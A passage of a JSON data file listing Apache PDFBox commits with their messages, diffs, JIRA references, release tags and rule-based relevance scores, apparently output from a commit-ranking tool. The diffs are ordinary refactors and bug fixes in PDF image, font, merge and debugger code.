"pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4242": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "47de78239855498beea5333498481e0dad6f41d7" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4242", + "relevance": 2 + } + ] + }, + { + "commit_id": "4c77ee8b4e51a4182915b57f0c67d372bf1cb109", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523387368, + "hunks": 19, + "message": "PDFBOX-4187: refactor, use the alpha value from getRGB() git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828848 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "index 9cd871872..06f1e7582 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", + "@@ -19,4 +19,2 @@ import java.awt.Transparency;", + " import java.awt.image.BufferedImage;", + "-import java.awt.image.DataBuffer;", + "-import java.awt.image.WritableRaster;", + " import java.io.ByteArrayInputStream;", + "@@ -63,3 +61,2 @@ public final class LosslessFactory", + " int[] rgbLineBuffer = new int[width];", + "- byte[] imageData;", + "@@ -70,7 +67,4 @@ public final class LosslessFactory", + " bpc = image.getColorModel().getPixelSize();", + "- deviceColorSpace = PDDeviceGray.INSTANCE;", + "- ", + "- ByteArrayOutputStream bos = new ByteArrayOutputStream((width*bpc/8)+(width*bpc%8 != 0 ? 1:0)*height);", + "- MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(bos);", + "- ", + "+ ByteArrayOutputStream baos = new ByteArrayOutputStream(((width*bpc/8)+(width*bpc%8 != 0 ? 1:0))*height);", + "+ MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(baos);", + " for (int y = 0; y < height; ++y)", + "@@ -81,3 +75,3 @@ public final class LosslessFactory", + " }", + "- ", + "+", + " int bitOffset = mcios.getBitOffset();", + "@@ -85,3 +79,3 @@ public final class LosslessFactory", + " {", + "- mcios.writeBits(0, 8-bitOffset);", + "+ mcios.writeBits(0, 8 - bitOffset);", + " }", + "@@ -90,4 +84,5 @@ public final class LosslessFactory", + " mcios.close();", + "- ", + "- imageData = bos.toByteArray();", + "+", + "+ return prepareImageXObject(document, baos.toByteArray(), ", + "+ image.getWidth(), image.getHeight(), bpc, PDDeviceGray.INSTANCE);", + " }", + "@@ -98,148 +93,69 @@ public final class LosslessFactory", + " deviceColorSpace = PDDeviceRGB.INSTANCE;", + "- imageData = new byte[width*height*3];", + "+ byte[] imageData = new byte[width * height * 3];", + " int byteIdx = 0;", + "- ", + "- for (int y = 0; y < height; ++y)", + "+ int alphaByteIdx = 0;", + "+ int alphaBitPos = 7;", + "+ int transparency = image.getTransparency();", + "+ int apbc = transparency == Transparency.BITMASK ? 1 : 8;", + "+ byte[] alphaImageData;", + "+ if (transparency != Transparency.OPAQUE)", + " {", + "- for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", + "- {", + "- imageData[byteIdx++] = (byte)((pixel >> 16) & 0xFF);", + "- imageData[byteIdx++] = (byte)((pixel >> 8) & 0xFF);", + "- imageData[byteIdx++] = (byte)(pixel & 0xFF);", + "- }", + "- }", + "- }", + "-", + "- PDImageXObject pdImage = prepareImageXObject(document, imageData, ", + "- image.getWidth(), image.getHeight(), bpc, deviceColorSpace);", + "-", + "- // alpha -> soft mask", + "- PDImage xAlpha = createAlphaFromARGBImage(document, image);", + "- if (xAlpha != null)", + "- {", + "- pdImage.getCOSObject().setItem(COSName.SMASK, xAlpha);", + "- }", + "-", + "- return pdImage;", + "- }", + "-", + "- /**", + "- * Creates a grayscale Flate encoded PDImageXObject from the alpha channel", + "- * of an image.", + "- *", + "- * @param document the document where the image will be created.", + "- * @param image an ARGB image.", + "- *", + "- * @return the alpha channel of an image as a grayscale image.", + "- *", + "- * @throws IOException if something goes wrong", + "- */", + "- private static PDImageXObject createAlphaFromARGBImage(PDDocument document, BufferedImage image)", + "- throws IOException", + "- {", + "- // this implementation makes the assumption that the raster values can be used 1:1 for", + "- // the stream. ", + "- // Sadly the type of the databuffer is usually TYPE_INT and not TYPE_BYTE so we can't just", + "- // save it directly", + "- if (!image.getColorModel().hasAlpha())", + "- {", + "- return null;", + "- }", + "-", + "- // extract the alpha information", + "- WritableRaster alphaRaster = image.getAlphaRaster();", + "- if (alphaRaster == null)", + "- {", + "- // happens sometimes (PDFBOX-2654) despite colormodel claiming to have alpha", + "- return createAlphaFromARGBImage2(document, image);", + "- }", + "-", + "- int[] pixels = alphaRaster.getPixels(0, 0,", + "- alphaRaster.getWidth(),", + "- alphaRaster.getHeight(),", + "- (int[]) null);", + "- ByteArrayOutputStream bos = new ByteArrayOutputStream();", + "- int bpc;", + "- if (image.getTransparency() == Transparency.BITMASK)", + "- {", + "- bpc = 1;", + "- MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(bos);", + "- int width = alphaRaster.getWidth();", + "- int p = 0;", + "- for (int pixel : pixels)", + "- {", + "- mcios.writeBit(pixel);", + "- ++p;", + "- if (p % width == 0)", + "- {", + "- while (mcios.getBitOffset() != 0)", + "- {", + "- mcios.writeBit(0);", + "- }", + "- }", + "+ alphaImageData = new byte[((width * apbc / 8) + (width * apbc % 8 != 0 ? 1 : 0)) * height];", + " }", + "- mcios.flush();", + "- mcios.close();", + "- }", + "- else", + "- {", + "- bpc = 8;", + "- int dataType = alphaRaster.getDataBuffer().getDataType();", + "- // for 16 bit images divide by 256 ", + "- int shift = dataType == DataBuffer.TYPE_USHORT ? 8 : 0;", + "- for (int pixel : pixels)", + "+ else", + " {", + "- bos.write(pixel >>> shift);", + "+ alphaImageData = new byte[0];", + " }", + "- }", + "- PDImageXObject pdImage = prepareImageXObject(document, bos.toByteArray(), ", + "- image.getWidth(), image.getHeight(), bpc, PDDeviceGray.INSTANCE);", + "-", + "- return pdImage;", + "- }", + "-", + "- // create alpha image the hard way: get the alpha through getRGB()", + "- private static PDImageXObject createAlphaFromARGBImage2(PDDocument document, BufferedImage bi)", + "- throws IOException", + "- {", + "- ByteArrayOutputStream bos = new ByteArrayOutputStream();", + "- int bpc;", + "- if (bi.getTransparency() == Transparency.BITMASK)", + "- {", + "- bpc = 1;", + "- MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(bos);", + "- for (int y = 0, h = bi.getHeight(); y < h; ++y)", + "+ for (int y = 0; y < height; ++y)", + " {", + "- for (int x = 0, w = bi.getWidth(); x < w; ++x)", + "+ for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", + " {", + "- int alpha = bi.getRGB(x, y) >>> 24;", + "- mcios.writeBit(alpha);", + "+ imageData[byteIdx++] = (byte) ((pixel >> 16) & 0xFF);", + "+ imageData[byteIdx++] = (byte) ((pixel >> 8) & 0xFF);", + "+ imageData[byteIdx++] = (byte) (pixel & 0xFF);", + "+ if (transparency != Transparency.OPAQUE)", + "+ {", + "+ // we have the alpha right here, so no need to do it separately", + "+ // as done prior April 2018", + "+ if (transparency == Transparency.BITMASK)", + "+ {", + "+ // write a bit", + "+ alphaImageData[alphaByteIdx] |= ((pixel >> 24) & 1) << alphaBitPos;", + "+ if (--alphaBitPos < 0)", + "+ {", + "+ alphaBitPos = 7;", + "+ ++alphaByteIdx;", + "+ }", + "+ }", + "+ else", + "+ {", + "+ // write a byte", + "+ alphaImageData[alphaByteIdx++] = (byte) ((pixel >> 24) & 0xFF);", + "+ }", + "+ }", + " }", + "- while (mcios.getBitOffset() != 0)", + "+ if (transparency == Transparency.BITMASK)", + " {", + "- mcios.writeBit(0);", + "+ // skip boundary if needed", + "+ if (alphaBitPos != 7)", + "+ {", + "+ alphaBitPos = 7;", + "+ ++alphaByteIdx;", + "+ }", + " }", + " }", + "- mcios.flush();", + "- mcios.close();", + "- }", + "- else", + "- {", + "- bpc = 8;", + "- for (int y = 0, h = bi.getHeight(); y < h; ++y)", + "+ PDImageXObject pdImage = prepareImageXObject(document, imageData,", + "+ image.getWidth(), image.getHeight(), bpc, deviceColorSpace);", + "+", + "+ if (transparency != Transparency.OPAQUE)", + " {", + "- for (int x = 0, w = bi.getWidth(); x < w; ++x)", + "- {", + "- int alpha = bi.getRGB(x, y) >>> 24;", + "- bos.write(alpha);", + "- }", + "+ PDImageXObject pdMask = prepareImageXObject(document, alphaImageData,", + "+ image.getWidth(), image.getHeight(), apbc, PDDeviceGray.INSTANCE);", + "+ pdImage.getCOSObject().setItem(COSName.SMASK, pdMask);", + " }", + "- }", + "- PDImageXObject pdImage = prepareImageXObject(document, bos.toByteArray(), ", + "- bi.getWidth(), bi.getHeight(), bpc, PDDeviceGray.INSTANCE);", + "-", + "- return pdImage;", + "- } ", + "+ return pdImage;", + "+ } ", + "+ }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4187": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "0d5139b5efa8fb5d9b857fd6f96866b416f63ce0" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4187", + "relevance": 2 + } + ] + }, + { + "commit_id": "f7e4dd4de6d78a7a1f57b6df94dff0eba49fd0d3", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532535643, + "hunks": 2, + "message": "PDFBOX-4278: .notdef may have a stream git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836645 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "index 66a2fbe6d..26d64fe61 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", + "@@ -352,11 +352,6 @@ public class PDType3Font extends PDSimpleFont", + " String name = getEncoding().getName(code);", + "- if (!\".notdef\".equals(name))", + "+ COSBase base = getCharProcs().getDictionaryObject(COSName.getPDFName(name));", + "+ if (base instanceof COSStream)", + " {", + "- COSStream stream;", + "- stream = (COSStream)getCharProcs().getDictionaryObject(COSName.getPDFName(name));", + "- if (stream == null)", + "- {", + "- return null;", + "- }", + "- return new PDType3CharProc(this, stream);", + "+ return new PDType3CharProc(this, (COSStream) base);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4278": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "7bbbe04f3f964a7dd85aa7159ba552633a65d011" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4278", + "relevance": 2 + } + ] + }, + { + "commit_id": "d7b0cadb912398b60e78290197c11bf5ee4a882f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530041874, + "hunks": 1, + "message": "PDFBOX-4071: added comment on interface segregation principle violation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834456 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java", + "index 51e104192..4e8774220 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java", + "@@ -38,2 +38,3 @@ public class PDFunctionTypeIdentity extends PDFunction", + " throw new UnsupportedOperationException();", + "+ //TODO this is a violation of the interface segregation principle", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "f489b3a33c482e56b33c5eeaeafba54c30bd1400" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "c0a5d3263f4edb4a7cb18e8a6b771cd52b145b91", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528821629, + "hunks": 2, + "message": "PDFBOX-4071: fix typo git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833412 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", + "index d106951b9..fa0eb98c4 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", + "@@ -153,3 +153,3 @@ public class PDTrueTypeFont extends PDSimpleFont implements PDVectorFont", + " {", + "- // the TTF is fully loaded and it is save to close the underlying data source", + "+ // the TTF is fully loaded and it is safe to close the underlying data source", + " ttf.close();", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "index f0e623931..f21d27aef 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "@@ -119,3 +119,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " {", + "- // the TTF is fully loaded and it is save to close the underlying data source", + "+ // the TTF is fully loaded and it is safe to close the underlying data source", + " ttf.close();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "5bfb4bebbb307fa3f7e53bbd26979f9ef8eff072" + ], + [ + "no-tag", + "10eeea43a009f84f25ae2e42273c82f674f1ed8f" + ], + [ + "no-tag", + "1361b17b5b6558d023c466621eb0467856cb4cc4" + ], + [ + "no-tag", + "51ea7f5696688e4230f6cd527f2305fee743bf31" + ], + [ + "no-tag", + "bcb1e5b8e811e0cf2b16b5cf317aec9d979507ca" + ], + [ + "no-tag", + "678c2bba31751533b9ab3a224f8948679832d6fd" + ], + [ + "no-tag", + "8e61ca064c84348847bef6a2dc725a2621e9f332" + ], + [ + "no-tag", + "a189b83b2e50ce2f05b3f0074e8ce9fa89c05ac7" + ], + [ + "no-tag", + "21f2388f3f840cc8b142d994825d962d9a6f86b1" + ], + [ + "no-tag", + "d39a774a7bec85230fdbbf589ee9cf2719dfc0b6" + ], + [ + "no-tag", + "ef4d02fbac17344619e8ed6f6b6edebf48b474f8" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "caa033a27a338d7575fe0d85bf42a8aafbdbbabe", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524155251, + "hunks": 10, + "message": "PDFBOX-3999: clone objects not in mapping to prevent them from remaining attached to the source document git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829574 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index 61bd18924..90c656425 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -42,2 +42,3 @@ import org.apache.pdfbox.cos.COSName;", + " import org.apache.pdfbox.cos.COSNumber;", + "+import org.apache.pdfbox.cos.COSObject;", + " import org.apache.pdfbox.cos.COSStream;", + "@@ -740,3 +741,3 @@ public class PDFMergerUtility", + " {", + "- updatePageReferences(srcNumbersArray, objMapping);", + "+ updatePageReferences(cloner, srcNumbersArray, objMapping);", + " for (int i = 0; i < srcNumbersArray.size() / 2; i++)", + "@@ -966,3 +967,5 @@ public class PDFMergerUtility", + " */", + "- private void updatePageReferences(COSDictionary parentTreeEntry, Map objMapping)", + "+ private void updatePageReferences(PDFCloneUtility cloner,", + "+ COSDictionary parentTreeEntry, Map objMapping)", + "+ throws IOException", + " {", + "@@ -974,5 +977,26 @@ public class PDFMergerUtility", + " COSBase obj = parentTreeEntry.getDictionaryObject(COSName.OBJ);", + "- if (obj instanceof COSDictionary && objMapping.containsKey(obj))", + "+ if (obj instanceof COSDictionary)", + " {", + "- parentTreeEntry.setItem(COSName.OBJ, objMapping.get(obj));", + "+ if (objMapping.containsKey(obj))", + "+ {", + "+ parentTreeEntry.setItem(COSName.OBJ, objMapping.get(obj));", + "+ }", + "+ else", + "+ {", + "+ // PDFBOX-3999: clone objects that are not in mapping to make sure that", + "+ // these don't remain attached to the source document", + "+ COSBase item = parentTreeEntry.getItem(COSName.OBJ);", + "+ if (item instanceof COSObject)", + "+ {", + "+ LOG.debug(\"clone potential orphan object in structure tree: \" + item +", + "+ \", type: \" + ((COSDictionary) obj).getNameAsString(COSName.TYPE));", + "+ }", + "+ else", + "+ {", + "+ // don't display because of stack overflow", + "+ LOG.debug(\"clone potential orphan object in structure tree, type: \" +", + "+ ((COSDictionary) obj).getNameAsString(COSName.TYPE));", + "+ }", + "+ parentTreeEntry.setItem(COSName.OBJ, cloner.cloneForNewDocument(obj));", + "+ }", + " }", + "@@ -981,3 +1005,3 @@ public class PDFMergerUtility", + " {", + "- updatePageReferences((COSArray) kSubEntry, objMapping);", + "+ updatePageReferences(cloner, (COSArray) kSubEntry, objMapping);", + " }", + "@@ -985,3 +1009,3 @@ public class PDFMergerUtility", + " {", + "- updatePageReferences((COSDictionary) kSubEntry, objMapping);", + "+ updatePageReferences(cloner, (COSDictionary) kSubEntry, objMapping);", + " }", + "@@ -989,3 +1013,5 @@ public class PDFMergerUtility", + "- private void updatePageReferences(COSArray parentTreeEntry, Map objMapping)", + "+ private void updatePageReferences(PDFCloneUtility cloner,", + "+ COSArray parentTreeEntry, Map objMapping)", + "+ throws IOException", + " {", + "@@ -996,3 +1022,3 @@ public class PDFMergerUtility", + " {", + "- updatePageReferences((COSArray) subEntry, objMapping);", + "+ updatePageReferences(cloner, (COSArray) subEntry, objMapping);", + " }", + "@@ -1000,3 +1026,3 @@ public class PDFMergerUtility", + " {", + "- updatePageReferences((COSDictionary) subEntry, objMapping);", + "+ updatePageReferences(cloner, (COSDictionary) subEntry, objMapping);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3999": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "39c6d3cb118df719e05d7bbfe9b8dff4fd5c54f1" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3999", + "relevance": 2 + } + ] + }, + { + "commit_id": "bb2eb267a1c07112b65d09782503be01efa23fb0", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528999765, + "hunks": 1, + "message": "PDFBOX-4071: clarify toString() output git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1833538 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "index 666da8dcf..472396a4c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "@@ -552,3 +552,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " }", + "- return getClass().getSimpleName() + \"/\" + descendant + \" \" + getBaseFont();", + "+ return getClass().getSimpleName() + \"/\" + descendant + \", PostScript name: \" + getBaseFont();", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "0edd54a6b3d98d89b329e86d45a60505a64305e5" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "36903a94c92b0cae06e0778d32a545afa4fe4f28", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527057676, + "hunks": 4, + "message": "PDFBOX-2941: remove unneeded field in new method from previous commit git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832076 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "index 44d1b49b3..a9017b4c8 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", + "@@ -1401,3 +1401,2 @@ public class PDFDebugger extends JFrame", + " {", + "- PDDocument document;", + " while (true)", + "@@ -1406,3 +1405,3 @@ public class PDFDebugger extends JFrame", + " {", + "- document = open();", + "+ return open();", + " }", + "@@ -1430,5 +1429,3 @@ public class PDFDebugger extends JFrame", + " }", + "- break;", + " }", + "- return document;", + " }" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-2941": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "1aa2a219a44154b954607c50f4163615f71365bf" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-2941", + "relevance": 2 + } + ] + }, + { + "commit_id": "f6cd739c536e46b354c3b2607425038798725408", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1526593643, + "hunks": 1, + "message": "PDFBOX-4223: be lenient when encountering invalid /OpenAction git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831816 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index 329e6fbe2..7f14ebb8e 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -511,3 +511,3 @@ public class PDFMergerUtility", + "- destCatalog.setOpenAction(srcCatalog.getOpenAction());", + "+ destCatalog.setOpenAction(openAction);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4223": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "a7e92f4381120dafe1174be59f2b1838cbf98c83" + ], + [ + "no-tag", + "c3e216b49aedc67af52c32438dde96397cd21625" + ], + [ + "no-tag", + "67493d08260328826f0acbb58394395461bb9c9f" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4223", + "relevance": 2 + } + ] + }, + { + "commit_id": "8916f4dd35b3a0abbe76ba42e3f9a5f4da41249f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529080933, + "hunks": 3, + "message": "PDFBOX-4112: avoid self-closing elements for jdk10 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833610 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/ant/package.html 